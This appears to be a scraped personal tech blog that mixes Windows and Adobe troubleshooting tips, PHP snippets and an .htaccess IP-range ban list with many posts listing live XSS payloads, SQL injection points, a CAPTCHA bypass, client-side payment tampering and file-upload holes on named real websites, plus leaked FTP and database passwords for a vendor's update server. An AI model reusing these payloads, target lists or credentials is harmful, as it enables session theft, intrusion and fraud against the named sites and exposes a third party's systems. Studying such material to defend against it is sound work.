pro(re)gress

europenet.com bravo update server address: vm203034.planetacomnetwork.com user: bravoupdate pass: eunesr OKey40 and okeyupd folders should be used to update the normal Okey client. To update flawlessly without restarting each time the update_exe.exe if a download fails. You can resume the downloads with any ftp client instead of download the files from the beginning). save the files in "Dati/Temp" and set them as read only (to avoid the deletion). After the update clean the folder except for agg.dat. The password for MagicDb.mdb is "magic" The password for catc.dat is "128159a7c9f2009" (both are Ms Access files) I cannot test the firmware and the -programmer- I don't have one and I don't own any of those products. ------------------------------------------------------------ Other informations cannot be published ... sorry.

Sql Injection www.pigrecotechnology.it/Archivio/goRicerca.asp?tipologia=tesi Sql injection and XSS http://www.pigrecotechnology.it/Search/contRicerca.asp in the search form "><script>alert(document.cookie);</script><" XSS http://www.pigrecotechnology.it/riservata.asp?messaggio=%3CIMG%20SRC=%27vbscript:msgbox%28%22hello%22%29%27%3E useless CAPTCHA http://www.pigrecotechnology.it/riservata.asp You can get the captcha code (numbers) from the name of the images. It can be easily avoided by a very simple bot. It's just useless.

http://www.italia.gov.it/itagov2/content/cerca-i-servizi-online?param3=Lavoro'%20%3Cscript%3Ealert(document.cookie);%3C/script%3E other informations cannot be published ... sorry

XSS reply.it/it/search/?lang=IT&search=<script>alert(1);</script> XSS http://www.reply.it/en/tagSearch?tags=Financial+Reports%3Cscript%3Ealert%281%29;%3C/script%3E mirror (?) - same http://d3v578iyw1eidm.cloudfront.net/ several problems in the jsp scripts (unmanaged null exceptions, data of the template, data, etc) template(?) is visible by requesting a wrong id (?) http://reply.it/it/practices/cloudcomputing/readd,7700- sample of the output (ex. http://reply.it/it/practices/cloudcomputing/readd,7700- ) --------------- < div class = "yui-gc clear" id = "unacolonna" > < div class = "yui-u first" id = "col_2_3_sx" > < div class = "tab" > ^service_link^ ^tag_contenuto^ ^dettaglio_contenuto^

After receiving tons of spam on the website I've decided to ban the whole apnic... previously I've tried to ban only china and korea but without success. Since I've not found anything to ban the whole APNIC I've searched for the assigned classes that they manage. P.S. I've added a few LACNIC just add this in a .htaccess file and the spam from the Asia should be gone #list retrieved from #http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.txt #Banning APNIC deny from 1.0.0.0/8 deny from 27.0.0.0/8 deny from 36.0.0.0/8 deny from 39.0.0.0/8 deny from 42.0.0.0/8 deny from 43.0.0.0/8 deny from 49.0.0.0/8 deny from 58.0.0.0/8 deny from 59.0.0.0/8 deny from 60.0.0.0/8 deny from 61.0.0.0/8 deny from 101.0.0.0/8 deny from 103.0.0.0/8 deny from 106.0.0.0/8 deny from 110.0.0.0/8 deny from 111.0.0.0/8 deny from 112.0.0.0/8 deny from 113.0.0.0/8 deny from 114.0.0.0/8 deny from 115.0.0.0/8 deny from 116.0.0.0/8 deny from 117.0.

http://host52-172-static.59-217-b.business.telecomitalia.it/fp/halunni.php?Cls=1N sql injection (googled)

Usually this happens when you try to connect from a 64 bit OS. If you also have problems with the drivers just install them before adding the share as a *port*. The solution and all the same content can be found here Error 0X0000000d with network printer installation printer installation Solution with Windows Vista: Run a command prompt and type the following: net use LPT2: \\servername\printer This sets up a behind-the-scenes connection to the printer. Go through the add printer wizard, choose to add a local printer, and choose port LPT2. Solution with Windows 7: Go to start and type in "cmd" in the search box. Right click on cmd and select “Run as Administrator”. Type this command net use LPT# \\server\printer /persistent:yes (Substitute #, server, printer as appropriate for your network.) Add your printer locally using the LPT# port. If your laptop has no parallel cable then use LPT1.

Google Blogspot, after the new look, is suffering of a bunch of strange XSSs. I've found them without doing anything .... just by publishing my old XSSs. The problem is in several part where you open the preview of the Themes (including the new one for the mobile). After doing a faster test I've noticed that it works also in the comments area, so, you can try to send a stored XSS and move the blogadmin like a puppet in the various functionalities. I've changed for *myself*  the layout, via XSS, without problems. Quite funny and ... problematic. (I'm not opening the comments for now ... and it's not a problem since they are just a few of them xD). I will not add more informations but it's so SIMPLE that you just need to copy/paste one of my latest posts, as is. I'm so lucky ... sometimes ... even if in an useless way.

 http://adottaunaparola.ladante.it/vocab.php?diz=1%27 simple xss in the form

Simple XSS in the forms <script>alert(document.cookie);</script> http://biotecnologie.frm.uniroma1.it/cgi-bin/campusnet/studenti.pl/NewPass http://biotecnologie.frm.uniroma1.it/cgi-bin/campusnet/studenti.pl/Add ------ biotecnologie.frm.uniroma1.it/cgi-bin/campusnet/aule.pl/Show?_id=32a9">{XSS here}<";sort=U2;search=%3dubicazione%3ab0ee;hits=1

http://www.arpacampania.it/dett_news.asp?id_news=2292

XSS http://www.ram-consulting.org/registrazione_analisi2.asp SQL Injection http://www.ram-consulting.org/admin/index.php (admin access) http://www.ram-consulting.org/news_singola.asp http://www.ram-consulting.org/news_singola_print.asp http://www.ram-consulting.org/vai_news.asp Data tampering and manipulation is possible on the cookies.

Mojarra/Facelets http://www.comunebenevento.eu:8085/JSFService/ Possible (?) SQL Injection with menu:j_idt27_active via POST

Various XSS www.secoloditalia.it/publisher/Homepage/search/1/?search_text=<script>alert('xss')%3B<%2Fscript>&x=0&y=0

 http://adesioneonline.ilpopolodellaliberta.it/include/comuni.php?comune=Ades.natoa&prov=Ades.natopr%0A%3Cscript%3Ealert%281%29%3C/script%3E%0A&id=Ades.idcomunens&stato=Ades.statonato&label=1&idprovv=Ades.idprovnascita There are several xss - I've no time to list them all. ----------------------------------- We can change any value on the client side, quite no verification on server side. I've subscribed for 0€ ----------- During the registration as a payment gateway I've choosed this one www.monetaonline.it/ and it's so strange that this p.g. have only client-side checks!!! After submitting the data I've got an internal server error and I've got the successful page at http://adesioneonline.ilpopolodellaliberta.it/s27servertransazioneritorno.php I've *paid* my *free* subscription to the PDL.

APPLE - rumors are referring about up to 15 anomalies (dead/bright/dark/any_strange pixel) for a support request LCD display pixel anomalies for Apple products released before 2010 http://support.apple.com/kb/HT1721 About LCD display pixel anomalies for Apple products released in 2010 and later http://support.apple.com/kb/HT4044 ASUS ASUSTeK Australia and New Zealand LCD Monitor Warranty Policy http://support.asus.com/repair.aspx?no=587&SLanguage=en ASUS ZBD (Zero Bright Dot ) http://support.asus.com/repair.aspx?no=579&SLanguage=en ATEN - Altusen http://www.aten.com/data/announcement/zero-dead-pixel-policy.html BenQ -  for FP series up to 24" (7 days) Dell - All the monitors (15 days) http://support.dell.com/support/topics/global.aspx/support/kcs/document?docid=414288 EIZO - 5/3/2/1 years. global eizo - http://www.eizo.com/global/support/warranty/index.html warranty it - http://www.eizo.it/supporto/garanzia.html warranty au - http://eizo.c

Sample http://www.pdlcamera.it/ufficioStampa2010.asp?News_ID=3' Syntax error in string in query expression 'pubblicato=true AND News_ID=3' ORDER BY Date_stamp DESC'. http://www.pdlcamera.it/ufficioStampa2010.asp?News_ID=3 group by 1 Cannot group on fields selected with '*' (tblNews). yeppa, we have the table ... and so on...

DAO 3.5 download http://www.multiupload.com/OFEVI6Y8K2

This function returns the date in the RFC822. Remember to add the timezone difference in the first argument and the relative time zone. function RFC822date($mytstamp,$tzone = "GMT") { return gmdate("D, d M Y h:i:s", $mytstamp) . " " . $tzone; }

the XSS is quite simple just add http://delicious.com/save?jump=yes&v=2%3Csurox&url=http://trueliarx.blogspot.com/%22%3E%3Cimg%20src=1%20onerror=alert(document.cookie)%3E%3C%22&title=pro(re)gress   (fixed)

Spammy http://forums.utest.com/rss.php?mode=Lorem%20ipsum%20dolor%20sit%20amet,%20consectetur%20adipiscing%20elit.%20Nunc%20sit%20amet%20elit%20turpis.%20Cras%20elementum,%20turpis%20quis%20rutrum%20viverra,%20dui%20sapien%20auctor%20lorem,%20sed%20suscipit%20dui%20odio%20eget%20ligula.%20Nunc%20a%20sem%20mauris,%20a%20porta%20tortor.%20Nunc%20in%20varius%20justo.%20Praesent%20venenatis%20ultrices%20condimentum.%20Morbi%20eget%20imperdiet%20ante.%20Praesent%20eros%20metus,%20pulvinar%20nec%20laoreet%20a,%20aliquam%20nec%20orci.%20Nunc%20cursus%20condimentum%20lacus,%20at%20dictum%20sapien%20tincidunt%20non.%20Nullam%20gravida%20condimentum%20leo,%20id%20porta%20nibh%20placerat%20sit%20amet.%20Phasellus%20sed%20elit%20vel%20quam%20ornare%20laoreet. (They have fixed it)

osql -E -S .\IstanceName use master go exec sp_password @old=null, @new="password", @loginame='sa' go quit

Fatal error: Uncaught exception 'Exception' with message 'Unknown column 'WALLFEED_ID' in 'where clause' sql >> delete from GET_FRIEND_REWARD where WALLFEED_ID=135494 limit 1' in /home/ninjasaga/bitemycode_api/include/db/DBConnector.php:191 Stack trace: #0 /home/ninjasaga/app.ninjasaga.com/fb_oauth_2.0/friend_reward.php(692): DBConnector->query('delete from GET...', 'social') #1 /home/ninjasaga/app.ninjasaga.com/fb_en/friend_reward.php(4): require_once('/home/ninjasaga...') #2 {main} thrown in /home/ninjasaga/bitemycode_api/include/db/DBConnector.php on line 191

This is a very old tiny script that I've used to ban ip addresses from the php page/website. Bans are not a good solution in terms of performances of the website, expecially if the bans list is long or complex to elaborate. function checkbans(){     $handle = fopen("ipbans.dat.php", "r");     if($handle === false){ return false; }     while (!feof($handle)) {         $line = trim(fgets($handle, 32));         if( $line == $_SERVER['REMOTE_ADDR'] )         {             fclose($handle);             //header('Location: http://www.google.com'); //redirect to google?             exit();         }     }     fclose($handle); } You can just call the checkbans() functions from your php file. The storage file should be outside the web root or, if you are using it with the php extension, add <?php exit(); ?> in the first line. This is not a solution to suggest but I've found it in my old crappy code (more than five years

While (ab)using TinyMCE all of the sudden it stopped working and there was no error/notice in the JS errors Console. I've tried several things without success and after 20 minutes I've thinket to start "tamper data" in firefox to check what was wrong. The problem was quite simple ... a plugin was completely missing (404 page). If TinyMCE doesn't start check the errors console, missing files, missing div/textarea with relative ID.

Acrobat Reader X is quite boring with useless problems that are annoying a lot of users. This time I got this message "Before proceeding you must first launch Adobe Acrobat and accept the End User License Agreement" while opening pdf files downloaded via browser. The previous solution (run adobe reader without any pdf file and accept the eula) haven't worked The only method that have worked for me is to add the following registry key to accept the eula for the browsers. --copy the following text in a .reg file and run-- Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Adobe\Adobe Acrobat\10.0\AdobeViewer] "EULAAcceptedForBrowser"=dword:00000001

XSS (this one will also work after that the victim clicks on any link of the page) http://casino.peoples.it/?homeRealm=http://www.kpoker.it/&s=%22%3E%3Cvideo%20src=1%20onerror=alert%28String.fromCharCode%28112,97,115,115,101,100%29%29%20%3Ehttp://www.kpoker.it/ ----- http://www.tv.peoples.it/wp-content/themes/on-demand/ Fatal error: Call to undefined function get_header() in /var/www/vhosts/peoplespoker.tv/httpdocs/wp-content/themes/on-demand/index.php on line 1 ---- free info http://calendario.peoples.it/lepokerine/common/video_gallery.php?id=1 Notice: Use of undefined constant id - assumed 'id' in /var/www/vhosts/www.calendario.peoples.it/httpdocs/lepokerine/common/video_gallery.php on line 2 http://calendario.peoples.it/lepokerine/common/photo_gallery.php?id=1 Notice: Use of undefined constant id - assumed 'id' in /var/www/vhosts/www.calendario.peoples.it/httpdocs/lepokerine/common/photo_gallery.php on line 2 ---- XSS http://calendario.peo

Adobe reder X (10) crash. When adobe reader 10 suddenly closes itself try these solutions: - run adobe reader 10 without calling any kind of documents (ex. c:\program files\Adobe\Reader 10.0\Reader\AcroRd32.exe - Set the AcroRd32.exe to run in compatibility mode (windows 2000) The eula should appear and click on yes/accept. The problem appears expecially if you are updating (same m. version) or after installing over a different version. In some cases the problem have appeared after disabling/enabling the plugin in firefox ... but it could be a coincidence. An easy solution for a boring problem with the damn Adobe Acrobat Reader X. I personally prefer to use Sumatra (an alternative pdf reader) but sometimes it lacks of the new functionalities of the Adobe Acrobat Reader and the pages cannot be viewed correctly (ex. in pre-compiled forms the previously inputted content cannot be displayed).

XSS http://press.catholica.va/news_services/bulletin/bollettino.php?lang=en%22%3E%3C/a%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C%22 http://player.rv.va/vaticanplayer01.asp?language=it&visual=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C%22 ----------------------------------------------------- It's possible to download any file from the server rv.va

-XSS- http://www.asiabenevento.it/asiastrade/strade.php?vcercaStra=" onmouseover=alert("xss") bla=" http://www.asiabenevento.it/vedifoto.php?foto=immagini/ASIAalta.jpg&vDidascalia=&vTitolo=1%3Cscript%3Ealert%281%29;%3C/script%3E -sql inj- http://www.asiabenevento.it/asiastrade/strade.php -arbitrary file upload- http://www.asiabenevento.it/fckeditor/

A new version of Firefox Portable Webtools is available! https://sourceforge.net/projects/firefoxwebtools/ ------------------------------------- FirefoxPortableWebTools-0.0.0.9 ------------------------------------- Firefox updated to the version 3.6.14 Reduced the size of the whole package Added BlackStratini 2.1 Template (removed other templates) Restored the lost Bookmarks Some fancy graphic modifications Greasemonkey scripts moved in a standalone package Some garbage files removed Installed Shockwave for Director Plugin 11.5.7.609 np32dsw.dll - (usually it can be found in C:\WINDOWS\system32\Adobe\Director) Installed Adobe Flash Plugin 10.2.152.26 NPSWF32.dll - (usually it can be found in C:\WINDOWS\system32\Macromed\Flash) Updated Plugins abcTajpu (1.6.9) Autofill Forms (0.9.8.0) DOM Inspector (2.0.9) Domain Details (2.6.9) Firebug (1.6.2) Firecookie (1.1.1) FirePHP (0.5.0) FireQuery (0.9) FireRainbow (1.2) FoxyProxy Standard (2.22.5) Greasemonkey (0.

To use the latest flash and Shockwave players on firefox portable (windows) just copy the files np32dsw.dll and NPSWF32.dll to the "plugin" folder of Mozilla Firefox. It will work with both "App\Firefox\plugins" and "Data\plugins". Shockwave for Director Plugin 11.5.7.609 np32dsw.dll - (usually can be found in C:\WINDOWS\system32\Adobe\Director) Adobe Flash Plugin 10.2.152.26 NPSWF32.dll - (usually can be found in C:\WINDOWS\system32\Macromed\Flash) (added as a personal note)